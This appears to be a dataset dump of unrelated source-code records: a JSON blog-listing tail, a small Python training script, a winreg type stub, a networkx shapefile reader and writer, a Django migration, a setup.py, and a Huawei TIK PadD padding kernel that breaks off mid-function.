"1179138674920312", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640398105870343], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/16ad9e3b96c04defb974ffe59bce0339~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "js中的事件委托/代理", "brief_content": "小编今天在做项目的时候,在项目的注释中发现了关于事件委托的注释(PS:虽然下面代码写的不是事件委托的代码!)", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629882927", "mtime": "1629955287", "rtime": "1629955287", "draft_id": "7000288125771579429", "view_count": 127, "collect_count": 0, "digg_count": 3, "comment_count": 0, "hot_index": 9, "is_hot": 0, "rank_index": 0.00298437, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1179138674920312", "user_name": "飞鹰3995", "company": "", "job_title": "前端开发", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/b77f29c98cf72a2e8fbd019bbc62991f~300x300.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 3, "post_article_count": 45, "digg_article_count": 1, "got_digg_count": 20, "got_view_count": 2430, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 44, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}], "user_interact": {"id": 7000293683836747790, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}], "cursor": "eyJ2IjoiNzAwNzk5MTg0ODMwODMxMDAyNCIsImkiOjc4ODB9", "count": 34210, "has_more": true} | [
"[email protected]"
] | |
1778e80f2fab17a4495abc3b59d9289f191e26ed | bb71e927dc2429abf551b44874ee990cb3a93f7a | /python/python_tricks/train.py | b7b940b5716ec1c81a6ebdd74a7e822126801790 | [] | no_license | khuyentran1401/Data-science | c37021349bb407ed50d891dab780463e0b243de5 | be59f5959be9f5944e12260fbb4548c85ef6aabe | refs/heads/master | 2023-08-31T13:46:58.212459 | 2023-08-09T15:46:11 | 2023-08-09T15:46:11 | 280,508,180 | 3,809 | 943 | null | 2023-05-23T02:38:37 | 2020-07-17T19:25:27 | Jupyter Notebook | UTF-8 | Python | false | false | 281 | py | import sys
model_type = sys.argv[1]
model_version = sys.argv[2]
model_path = f'''model/model1/{model_type}/version_{model_version}'''
print('Loading model from', model_path, 'for training')
# On the terminal type
# for version in 1 2 3 4
# do
# python train.py $version
# done | [
"[email protected]"
] | |
9593144727e4f55f8bc92271de4d519cd3632302 | 8e07b5b7a8dd38e0ef2c7ffc97d0392d886f32e6 | /venv/Lib/site-packages/mypy/typeshed/stdlib/3/winreg.pyi | 23482b55cac99932caabc054d47d219409f6ba40 | [] | no_license | RodrigoNeto/cursopythonyt | fc064a2e6106324e22a23c54bdb9c31040ac9eb6 | 279dad531e21a9c7121b73d84fcbdd714f435e7e | refs/heads/master | 2023-07-03T00:54:09.795054 | 2021-08-13T12:42:24 | 2021-08-13T12:42:24 | 395,646,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,827 | pyi | from types import TracebackType
from typing import Any, Optional, Tuple, Type, Union
_KeyType = Union[HKEYType, int]
def CloseKey(__hkey: _KeyType) -> None: ...
def ConnectRegistry(__computer_name: Optional[str], __key: _KeyType) -> HKEYType: ...
def CreateKey(__key: _KeyType, __sub_key: Optional[str]) -> HKEYType: ...
def CreateKeyEx(key: _KeyType, sub_key: Optional[str], reserved: int = ..., access: int = ...) -> HKEYType: ...
def DeleteKey(__key: _KeyType, __sub_key: str) -> None: ...
def DeleteKeyEx(key: _KeyType, sub_key: str, access: int = ..., reserved: int = ...) -> None: ...
def DeleteValue(__key: _KeyType, __value: str) -> None: ...
def EnumKey(__key: _KeyType, __index: int) -> str: ...
def EnumValue(__key: _KeyType, __index: int) -> Tuple[str, Any, int]: ...
def ExpandEnvironmentStrings(__str: str) -> str: ...
def FlushKey(__key: _KeyType) -> None: ...
def LoadKey(__key: _KeyType, __sub_key: str, __file_name: str) -> None: ...
def OpenKey(key: _KeyType, sub_key: str, reserved: int = ..., access: int = ...) -> HKEYType: ...
def OpenKeyEx(key: _KeyType, sub_key: str, reserved: int = ..., access: int = ...) -> HKEYType: ...
def QueryInfoKey(__key: _KeyType) -> Tuple[int, int, int]: ...
def QueryValue(__key: _KeyType, __sub_key: Optional[str]) -> str: ...
def QueryValueEx(__key: _KeyType, __name: str) -> Tuple[Any, int]: ...
def SaveKey(__key: _KeyType, __file_name: str) -> None: ...
def SetValue(__key: _KeyType, __sub_key: str, __type: int, __value: str) -> None: ...
def SetValueEx(
__key: _KeyType, __value_name: Optional[str], __reserved: Any, __type: int, __value: Union[str, int]
) -> None: ... # reserved is ignored
def DisableReflectionKey(__key: _KeyType) -> None: ...
def EnableReflectionKey(__key: _KeyType) -> None: ...
def QueryReflectionKey(__key: _KeyType) -> bool: ...
HKEY_CLASSES_ROOT: int
HKEY_CURRENT_USER: int
HKEY_LOCAL_MACHINE: int
HKEY_USERS: int
HKEY_PERFORMANCE_DATA: int
HKEY_CURRENT_CONFIG: int
HKEY_DYN_DATA: int
KEY_ALL_ACCESS: int
KEY_WRITE: int
KEY_READ: int
KEY_EXECUTE: int
KEY_QUERY_VALUE: int
KEY_SET_VALUE: int
KEY_CREATE_SUB_KEY: int
KEY_ENUMERATE_SUB_KEYS: int
KEY_NOTIFY: int
KEY_CREATE_LINK: int
KEY_WOW64_64KEY: int
KEY_WOW64_32KEY: int
REG_BINARY: int
REG_DWORD: int
REG_DWORD_LITTLE_ENDIAN: int
REG_DWORD_BIG_ENDIAN: int
REG_EXPAND_SZ: int
REG_LINK: int
REG_MULTI_SZ: int
REG_NONE: int
REG_QWORD: int
REG_QWORD_LITTLE_ENDIAN: int
REG_RESOURCE_LIST: int
REG_FULL_RESOURCE_DESCRIPTOR: int
REG_RESOURCE_REQUIREMENTS_LIST: int
REG_SZ: int
REG_CREATED_NEW_KEY: int # undocumented
REG_LEGAL_CHANGE_FILTER: int # undocumented
REG_LEGAL_OPTION: int # undocumented
REG_NOTIFY_CHANGE_ATTRIBUTES: int # undocumented
REG_NOTIFY_CHANGE_LAST_SET: int # undocumented
REG_NOTIFY_CHANGE_NAME: int # undocumented
REG_NOTIFY_CHANGE_SECURITY: int # undocumented
REG_NO_LAZY_FLUSH: int # undocumented
REG_OPENED_EXISTING_KEY: int # undocumented
REG_OPTION_BACKUP_RESTORE: int # undocumented
REG_OPTION_CREATE_LINK: int # undocumented
REG_OPTION_NON_VOLATILE: int # undocumented
REG_OPTION_OPEN_LINK: int # undocumented
REG_OPTION_RESERVED: int # undocumented
REG_OPTION_VOLATILE: int # undocumented
REG_REFRESH_HIVE: int # undocumented
REG_WHOLE_HIVE_VOLATILE: int # undocumented
error = OSError
# Though this class has a __name__ of PyHKEY, it's exposed as HKEYType for some reason
class HKEYType:
def __bool__(self) -> bool: ...
def __int__(self) -> int: ...
def __enter__(self) -> HKEYType: ...
def __exit__(
self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]
) -> Optional[bool]: ...
def Close(self) -> None: ...
def Detach(self) -> int: ...
| [
"[email protected]"
] | |
9848fd410ddb1d313b711e656fde9ae27d2261fd | 732d750ce7b96090bc1b252fbefdadfe167990a1 | /networker/io/__init__.py | 3ac84486d4ee66edda8e7eb94ebf4c159a76b37a | [] | no_license | carbz/networker | 4008174200db1865635f524646ad550187a4d289 | cab14026118db42603bd1a5757ec460c6cb4984d | refs/heads/master | 2021-01-15T10:24:59.858048 | 2015-04-22T17:11:49 | 2015-04-22T17:11:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py | # -*- coding: utf-8 -*-
import ogr
import osr
import networkx as nx
import networker.geomath as gm
from networker.classes.geograph import GeoGraph
import warnings
import os
"""
Package for reading/writing networkx based GeoGraphs
Note: these wrap existing networkx functions for custom behavior
"""
def load_shp(shp_path):
""" loads a shapefile into a networkx based GeoGraph object
Args:
shp_path: string path to a line or point shapefile
Returns:
geograph: GeoGraph
"""
# NOTE: if shp_path is unicode io doesn't work for some reason
shp_path = shp_path.encode('ascii', 'ignore')
g = nx.read_shp(shp_path)
coords = dict(enumerate(g.nodes()))
driver = ogr.GetDriverByName('ESRI Shapefile')
shp = driver.Open(shp_path)
layer = shp.GetLayer()
spatial_ref = layer.GetSpatialRef()
proj4 = None
if not spatial_ref:
if gm.is_in_lon_lat(coords):
proj4 = gm.PROJ4_LATLONG
else:
warnings.warn("Spatial Reference could not be set for {}".
format(shp_path))
else:
proj4 = spatial_ref.ExportToProj4()
g = nx.convert_node_labels_to_integers(g)
return GeoGraph(srs=proj4, coords=coords, data=g)
def write_shp(geograph, shp_dir):
""" writes a shapefile from a networkx based GeoGraph object
Args:
geograph: GeoGraph object
shp_dir: string path to dir to write shape files
"""
assert geograph.is_aligned()
# looks like networkx wants us to relabel nodes by their coords
tup_map = {i: tuple(coords) for i, coords in geograph.coords.items()}
# copy geograph to plain networkx graph
# (relabeling a GeoGraph doesn't seem to work)
nx_coord_graph = nx.Graph(data=geograph)
nx.relabel_nodes(nx_coord_graph, tup_map, copy=False)
nx.write_shp(nx_coord_graph, shp_dir)
if geograph.srs:
# write srs info to prj file (nx seems to miss this)
sr = osr.SpatialReference()
sr.ImportFromProj4(geograph.srs)
main_prj_filename = shp_dir + '.prj'
edge_prj_filename = os.path.join(shp_dir, 'edges.prj')
node_prj_filename = os.path.join(shp_dir, 'nodes.prj')
def write_prj(prj_filename):
out = open(prj_filename, 'w')
out.write(sr.ExportToWkt())
out.close()
write_prj(main_prj_filename)
write_prj(edge_prj_filename)
write_prj(node_prj_filename)
| [
"[email protected]"
] | |
43b694369a93e5b2fca5c24a9a3ea7ae339c90e4 | 604bd9370a5b4e61a5f9e533c6612bc94aef0c6c | /django/helpdesk_deploy_old/helpdesk/base/migrations/0005_auto_20201210_0554.py | ac187c287afd3fa9fa8cede7bf91012b73480f43 | [
"Apache-2.0"
] | permissive | Netromnik/python | 2ba2f15b56e635b53c12ef39ed776b9577c08dff | 630a9df63b1cade9af38de07bb9cd0c3b8694c93 | refs/heads/main | 2023-06-16T04:58:35.634371 | 2021-07-18T16:20:13 | 2021-07-18T16:20:13 | 355,891,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | # Generated by Django 3.1.2 on 2020-12-10 05:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0004_auto_20201114_1445'),
]
operations = [
migrations.AddField(
model_name='collectmedia',
name='groups',
field=models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='_collectmedia_groups_+', to='base.CustomGroup', verbose_name='groups'),
),
migrations.AlterField(
model_name='collectmedia',
name='name',
field=models.CharField(max_length=30, unique=True),
),
]
| [
"[email protected]"
] | |
e261f4ac64cfeda090c8d41631cb690d60dd4505 | 964f2882117ff656d7a2757c233c6dd88226d975 | /services/autoscaling/setup.py | e3e711abf8319d6d068bac1c11a37bd4253ee6bd | [
"MIT"
] | permissive | ignapas/osparc-simcore | a002dd47d7689af9c1c650eea33e31add2b182c1 | cb62e56b194265a907f260f3071c55a65f569823 | refs/heads/master | 2023-01-22T08:55:32.580775 | 2022-12-09T15:57:36 | 2022-12-09T15:57:36 | 170,852,656 | 0 | 0 | MIT | 2023-01-09T05:03:04 | 2019-02-15T11:12:34 | Python | UTF-8 | Python | false | false | 1,726 | py | #!/usr/bin/env python3
import re
import sys
from pathlib import Path
from setuptools import find_packages, setup
def read_reqs(reqs_path: Path) -> set[str]:
return {
r
for r in re.findall(
r"(^[^#\n-][\w\[,\]]+[-~>=<.\w]*)",
reqs_path.read_text(),
re.MULTILINE,
)
if isinstance(r, str)
}
CURRENT_DIR = Path(sys.argv[0] if __name__ == "__main__" else __file__).resolve().parent
NAME = "simcore-service-autoscaling"
VERSION = (CURRENT_DIR / "VERSION").read_text().strip()
AUTHORS = (
"Alexandre Allexandre (Surfict)",
"Sylvain Anderegg (sanderegg)",
"Pedro Crespo-Valero (pcrespov)",
)
DESCRIPTION = "Service to autoscale swarm resources"
README = (CURRENT_DIR / "README.md").read_text()
PROD_REQUIREMENTS = tuple(
read_reqs(CURRENT_DIR / "requirements" / "_base.txt")
| {
"simcore-models-library",
"simcore-service-library[fastapi]",
"simcore-settings-library",
}
)
TEST_REQUIREMENTS = tuple(read_reqs(CURRENT_DIR / "requirements" / "_test.txt"))
SETUP = dict(
name=NAME,
version=VERSION,
author=AUTHORS,
description=DESCRIPTION,
long_description=README,
license="MIT license",
python_requires="~=3.9",
packages=find_packages(where="src"),
package_dir={
"": "src",
},
include_package_data=True,
install_requires=PROD_REQUIREMENTS,
test_suite="tests",
tests_require=TEST_REQUIREMENTS,
extras_require={"test": TEST_REQUIREMENTS},
entry_points={
"console_scripts": [
"simcore-service-autoscaling = simcore_service_autoscaling.cli:main",
],
},
)
if __name__ == "__main__":
setup(**SETUP)
| [
"[email protected]"
] | |
9f579c8c5747a6de0aa87b0fd4321ae93b6efe44 | 1ebe5a07e7f6260c2c2ceb6ca00dcf2a0341e544 | /op_impl/built-in/ai_core/tbe/impl/dynamic/pad_not_align.py | 98cd8a0f3f998ba392725878df3a65ed17db1c78 | [] | no_license | gekowa/ascend-opp | f5e09905336d85f9974d555d03d37a75cb8185c1 | 5c28a2faf9d2a117ea6f0923efe35fcd53904dd2 | refs/heads/master | 2023-04-09T12:14:40.337104 | 2021-04-19T23:00:59 | 2021-04-19T23:00:59 | 359,620,865 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,929 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the Apache License Version 2.0.You may not use this file
except in compliance with the License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
Apache License for more details at
http://www.apache.org/licenses/LICENSE-2.0
PadD: Not Align
"""
from te import tik
# vector_repeat
MAX_REPEAT = 255
# block_size
BLOCK_SIZE = 32
def set_vector_dup(obj, num_data, number):
"""
Re:
Func supports that num_data == N*mask(less than buf_size)
"""
tik_instance = obj.tik_instance
unit = MAX_REPEAT * obj.mask
repeat_merchant = num_data // unit
repeat_remainder = num_data % unit
dst_blk_stride = 1
dst_rep_stride = 8
with tik_instance.for_range(0, repeat_merchant) as i:
tik_instance.vector_dup(obj.mask,
obj.buf[i*unit],
number,
MAX_REPEAT,
dst_blk_stride,
dst_rep_stride)
with tik_instance.if_scope(repeat_remainder != 0):
repeats = repeat_remainder / obj.mask
with tik_instance.if_scope(repeats != 0):
tik_instance.vector_dup(obj.mask,
obj.buf[repeat_merchant*unit],
number,
repeats,
dst_blk_stride,
dst_rep_stride)
def copy_buf2gm_circulation(obj, ac_num, vir_num, dst_idx, pattern=None):
"""
ac_num: vol of actual_data in UB.
vir_num: ultimate value for ac_num that must be 32B align.
pattern: "top" and "bottom" in recursion will has different ways.
Re: Func has three kinds to move_out.
1. ac_num is too lager to save in UB.
2. ac_num >= 32B that includes part of align and not.
3. ac_num < 32B that only support "Single Core".
"""
tik_instance = obj.tik_instance
num_bit = obj.num_bit
dst = obj.output_gm
src = obj.buf
tail = ac_num // vir_num
tail_block = ac_num % vir_num
block_num = BLOCK_SIZE // num_bit
def _copy_ub2gm(begin_idx, data_len, idx):
idx += begin_idx
n_burst = 1
burst_len = data_len * num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(dst[idx],
src[0],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
# kind_0
with tik_instance.if_scope(tail != 0):
with tik_instance.for_range(0, tail) as serial:
_copy_ub2gm(serial*vir_num, vir_num, dst_idx)
with tik_instance.if_scope(tail_block != 0):
align_vol = tail_block / block_num * block_num
not_align_vol = tail_block % block_num
offset = block_num - not_align_vol
# kind_1
with tik_instance.if_scope(align_vol != 0):
_copy_ub2gm(tail*vir_num, align_vol, dst_idx)
# kind_2
with tik_instance.if_scope(not_align_vol != 0):
address = tail * vir_num + align_vol - offset
if pattern == "bottom":
_copy_ub2gm(address, block_num, dst_idx)
else:
with tik_instance.if_scope(address > 0):
_copy_ub2gm(address, block_num, dst_idx)
with tik_instance.else_scope():
_copy_ub2gm(0, block_num, dst_idx)
def _do_vec_dup(pattern, obj, max_num, blk_idx, mark, axis):
"""
Params:
top_address: start address for top padding.
top_div_core: dividing line between two types of cores in top padding.
top_total_core: physical cores for top padding.
top_core_vol_x: volume of data processed by each core(type_x) for top padding.
top_core_gap_x: gap between different cores(type_x) for top padding.
Solution: MAX_CORE = 32
in_shape is [34,16,16,16,...],func will work in [0, ] only.
in_shape is [16,16,16,16,...],func will work in [0, 1].
"""
if pattern == "top":
begin_index = obj.top_address[axis]
division_core = obj.top_div_core[axis]
total_core = obj.top_total_core[axis]
core_data_0 = obj.top_core_vol_0[axis]
core_data_1 = obj.top_core_vol_1[axis]
core_gap_0 = obj.top_core_gap_0[axis]
core_gap_1 = obj.top_core_gap_1[axis]
pad_data = obj.top_vol[axis]
else:
begin_index = obj.bottom_address[axis]
division_core = obj.bottom_div_core[axis]
total_core = obj.bottom_total_core[axis]
core_data_0 = obj.bottom_core_vol_0[axis]
core_data_1 = obj.bottom_core_vol_1[axis]
core_gap_0 = obj.bottom_core_gap_0[axis]
core_gap_1 = obj.bottom_core_gap_1[axis]
pad_data = obj.bottom_vol[axis]
# discriminate first layer or not.
offset = obj.tik_instance.Scalar("int64", name="cir_offset_")
offset_value = pad_data - core_data_0 * (division_core + 1) \
- core_data_1 * (total_core - division_core - 1)
offset.set_as(offset_value)
with obj.tik_instance.if_scope(pad_data - core_data_0 == 0):
# not the first layer
offset.set_as(0)
vir_num, block_index = max_num, blk_idx
# vector_dup: all physical cores.
with obj.tik_instance.if_scope(mark != 1):
set_vector_dup(obj, vir_num, 0)
# data_move
with obj.tik_instance.if_scope(block_index < division_core):
dst_idx = begin_index + block_index * core_gap_0
copy_buf2gm_circulation(obj, core_data_0, vir_num, dst_idx)
with obj.tik_instance.if_scope(block_index == division_core):
dst_idx = begin_index + division_core * core_gap_0
copy_buf2gm_circulation(obj, core_data_0+offset, vir_num, dst_idx)
with obj.tik_instance.if_scope(
tik.all(block_index > division_core,
block_index < total_core)):
begin_index += core_gap_0 * (division_core + 1) + offset
block_index = block_index - (division_core + 1)
dst_idx = begin_index + block_index * core_gap_1
copy_buf2gm_circulation(obj, core_data_1, vir_num, dst_idx)
def _copy_gm2buf(obj, in_num, src_ub, src_gm):
# ub must can be save all_data
obj.tik_instance.data_move(obj.buf[src_ub],
obj.input_gm[src_gm],
0, 1,
in_num * obj.num_bit // BLOCK_SIZE,
0, 0)
def _copy_buf2buf(obj, n_burst, burst_len, src_stride, dst_stride, src_ub, dst_ub):
obj.tik_instance.data_move(obj.buf[dst_ub],
obj.buf[src_ub],
0, n_burst, burst_len,
src_stride, dst_stride)
def _copy_buf2gm(obj, in_num, dst_gm, max_num):
"""
Re:
in_num: data that can be any value.
Func requires in_num <= buf_size.
"""
tik_instance = obj.tik_instance
block_num = BLOCK_SIZE // obj.num_bit
align_vol = in_num / block_num * block_num
not_align_vol = in_num % block_num
offset = block_num - not_align_vol
def _move_out(begin_idx, data_len, dst_idx, buf):
dst_idx += begin_idx
n_burst = 1
burst_len = data_len * obj.num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(obj.output_gm[dst_idx],
buf[0],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
# Maybe not align.
tik_align(obj, in_num, max_num, block_num)
with tik_instance.if_scope(align_vol == 0):
_move_out(0, block_num, dst_gm, obj.buf)
with tik_instance.else_scope():
_move_out(0, align_vol, dst_gm, obj.buf)
# Move out not align
with tik_instance.if_scope(not_align_vol != 0):
index = align_vol-offset
with tik_instance.for_range(0, block_num) as i:
obj.help_buf[i] = obj.buf[index+i]
_move_out(index, block_num, dst_gm, obj.help_buf)
def _data_move_last_dim(obj, in_num, src_gm, dst_gm, max_num):
"""
in_num: actual input data(not padding).
Re:
Func requires in_num must >= 32(tiling.cpp)
"""
tik_instance = obj.tik_instance
block_num = BLOCK_SIZE // obj.num_bit
vir_num = obj.buf_size
# move align of in_num
tail = in_num // vir_num
tail_block = in_num % vir_num
def _move_in(begin_idx, data_len, src_idx, buf):
src_idx += begin_idx
n_burst = 1
burst_len = data_len * obj.num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(buf[0],
obj.input_gm[src_idx],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
def _move_out(begin_idx, data_len, dst_idx, buf):
dst_idx += begin_idx
n_burst = 1
burst_len = data_len * obj.num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(obj.output_gm[dst_idx],
buf[0],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
# Must align: buf_size is N * mask.
with tik_instance.if_scope(tail != 0):
with tik_instance.for_range(0, tail) as serial:
_move_in(serial*vir_num, vir_num, src_gm, obj.buf)
_move_out(serial*vir_num, vir_num, dst_gm, obj.buf)
# Maybe not align.
with tik_instance.if_scope(tail_block != 0):
align_vol = tail_block / block_num * block_num
not_align_vol = tail_block % block_num
offset = block_num - not_align_vol
# Move in
tik_align(obj, tail_block, max_num, block_num)
with tik_instance.if_scope(align_vol == 0):
_move_in(tail*vir_num-offset, block_num, src_gm, obj.buf)
_move_out(tail*vir_num-offset, block_num, dst_gm, obj.buf)
with tik_instance.else_scope():
_move_in(tail*vir_num, max_num, src_gm, obj.buf)
_move_out(tail*vir_num, align_vol, dst_gm, obj.buf)
# Move out not align
with tik_instance.if_scope(not_align_vol != 0):
index = align_vol-offset
with tik_instance.for_range(0, block_num) as i:
obj.help_buf[i] = obj.buf[index+i]
_move_out(tail*vir_num+index, block_num, dst_gm, obj.help_buf)
def tik_max(obj, top, bottom, max_num):
max_num.set_as(bottom)
with obj.tik_instance.if_scope(top > bottom):
max_num.set_as(top)
tik_align(obj, max_num, max_num, obj.mask)
def tik_align(obj, in_num, max_num, align_vol):
"""
in_num: vol of data
max_num: scalar to save result of func.
align_vol: standard of align: (BLOCK_SIZE/num_bit) or mask.
buf_size: must be N*(BLOCK_SIZE/num_bit) or M*mask.
Re:
In module of "not_align", some vars must be align in computation.
"""
max_num.set_as(in_num)
with obj.tik_instance.if_scope(in_num % align_vol != 0):
max_num.set_as((in_num / align_vol + 1) * align_vol)
with obj.tik_instance.if_scope(max_num >= obj.buf_size):
max_num.set_as(obj.buf_size)
def _circulation(obj, blk_idx, mark, axis):
"""
eg: input: [16,16,22] output: [18,18,24]
padding:[[1,1],[1,1],[1,1]]
depth: 2
input: [16,16,4] output: [18,18,6]
padding:[[1,1],[1,1],[1,1]]
depth: 1
ps: input[1] can't satisfy multi core
top_vol[0]: 1*18*24;
bottom_vol[1]: 1*24;
"""
# vol of padding.
max_num = obj.tik_instance.Scalar("int32", name="max_num_")
tik_max(obj, obj.top_vol[axis], obj.bottom_vol[axis], max_num)
# do padding
with obj.tik_instance.if_scope(obj.top_vol[axis] > 0):
_do_vec_dup("top", obj, max_num, blk_idx, mark, axis)
mark.set_as(1)
with obj.tik_instance.if_scope(obj.bottom_vol[axis] > 0):
_do_vec_dup("bottom", obj, max_num, blk_idx, mark, axis)
mark.set_as(1)
def _recursion(obj, axis, dst_gm, src_gm, src_ub, dst_ub, max_num, mark):
"""
recur_model: model include "Sort" and "MoveIn". "Sort" mean that shape[axis:] can be sorted in UB, "MoveIn" not.
recur_dup_mk: mark of vector dup or not (One-Time-Triggered).
prod_new_out: axis-by-axis multiplication base on new out_shape.
prod_new_in: axis-by-axis multiplication base on new in_shape.
recur_gm2buf_mk: mark of GM_2_BUF (One-Time-Triggered).
new_padding_top: top of new_padding in recursion.
new_in_shape: new in_shape in recursion
"""
if axis == obj.axis_amount:
return
# ==================================
# Only axis >= depth, tik will work.
# ==================================
# Status in different layers: Sort or MoveIn
model = obj.recur_model[axis]
buf_src = obj.tik_instance.Scalar("int32", name="buf_src_"+str(axis)+"_")
buf_dst = obj.tik_instance.Scalar("int32", name="buf_dst_"+str(axis)+"_")
buf_src.set_as(src_ub)
buf_dst.set_as(dst_ub)
# ===============================
# Step1: Condition: "Sort"
# Requirement: in_shape[-1] < 32
# ===============================
with obj.tik_instance.if_scope(model == 1):
# Vector_Dup (One-Time-Triggered)
# mark_dup: vec_dup or not.
mark_dup = obj.recur_dup_mk[axis]
with obj.tik_instance.if_scope(mark_dup == 1):
tik_align(obj, obj.prod_new_out[axis], max_num, obj.mask)
set_vector_dup(obj, max_num, 0)
# GM_2_BUF (One-Time-Triggered)
# mark_gm2buf: dma data from gm to ub or not.
mark_gm2buf = obj.recur_gm2buf_mk[axis]
with obj.tik_instance.if_scope(mark_gm2buf == 1):
# init_align buf_src and num of moveIn.
# requirement: align(output) + align(input) <= buf_size
tik_align(obj, obj.prod_new_out[axis], buf_src, BLOCK_SIZE/obj.num_bit)
tik_align(obj, obj.prod_new_in[axis], max_num, BLOCK_SIZE/obj.num_bit)
_copy_gm2buf(obj, max_num, buf_src, src_gm)
# Go to next level until the last dim
top = obj.new_padding_top[axis] * obj.prod_new_out[axis+1]
if axis <= obj.axis_amount - 2:
loop = obj.new_in_shape[axis]
with obj.tik_instance.for_range(0, loop) as i:
dst_ub = buf_dst + top + obj.prod_new_out[axis+1] * i
src_ub = buf_src + obj.prod_new_in[axis+1] * i
_recursion(obj, axis+1, dst_gm, src_gm, src_ub, dst_ub, max_num, True)
# the last dim
# require total_num_ub < 32
else:
total_scalar = obj.prod_new_in[axis]
with obj.tik_instance.for_range(0, total_scalar) as i:
obj.buf[buf_dst + top + i] = obj.buf[buf_src + i]
# BUF_2_GM (One-Time-Triggered)
# Only happened in the layer which GM_2_BUF had worked.
with obj.tik_instance.if_scope(mark_gm2buf == 1):
in_num = obj.prod_new_out[axis]
_copy_buf2gm(obj, in_num, dst_gm, max_num)
# ================================
# Step0: Condition: "MoveIn"
# Requirement: in_shape[-1] >= 32
# ================================
if not mark:
with obj.tik_instance.if_scope(model == 0):
in_num_top = obj.new_padding_top[axis] * obj.prod_new_out[axis+1]
in_num_bottom = obj.new_padding_bottom[axis] * obj.prod_new_out[axis+1]
tik_max(obj, in_num_top, in_num_bottom, max_num)
# vec_dup or not
with obj.tik_instance.if_scope(max_num > 0):
set_vector_dup(obj, max_num, 0)
# axis in [0: last_dim), in_num_X must >= 32 or 0.
# axis is last_dim, in_num_X can be any.
with obj.tik_instance.if_scope(in_num_top > 0):
copy_buf2gm_circulation(obj, in_num_top, max_num, dst_gm, "top")
with obj.tik_instance.if_scope(in_num_bottom > 0):
dst_gm_bottom = dst_gm + obj.new_in_shape[axis] * \
obj.prod_new_out[axis+1] + in_num_top
copy_buf2gm_circulation(obj, in_num_bottom, max_num, dst_gm_bottom, "bottom")
dst_gm += in_num_top
if axis <= obj.axis_amount - 2:
with obj.tik_instance.for_range(0, obj.new_in_shape[axis]) as i:
dst_gm += obj.prod_new_out[axis+1] * i
src_gm += obj.prod_new_in[axis+1] * i
_recursion(obj, axis+1, dst_gm, src_gm, buf_src, buf_dst, max_num, False)
else:
# copy_buf2gm until model is "MoveIn" in the last axis.
_data_move_last_dim(obj, obj.prod_new_in[axis], src_gm, dst_gm, max_num)
def _circulation_compute(obj, blk_idx):
"""
Supposing all axis should be traversed until axis exceed "depth".
depth: depth from tiling.cpp.
mark: status register to avoid invalid vector_dup in circulation
"""
tik_instance = obj.tik_instance
mark = obj.tik_instance.Scalar("int32", name="mark", init_value=0)
for axis, _ in enumerate(range(obj.axis_amount)):
with tik_instance.if_scope(axis < obj.depth[0]):
_circulation(obj, blk_idx, mark, axis)
def _recursion_compute(obj, blk_idx):
"""
recur_cond: condition that torch off stride between different cores.
recur_gap_x: gap_x between in diff cores.
recur_loop_x: work times by each core(type_x).
recur_in_vol: volume of input_data by each core do once.
recur_div_core: dividing line between two types of core.
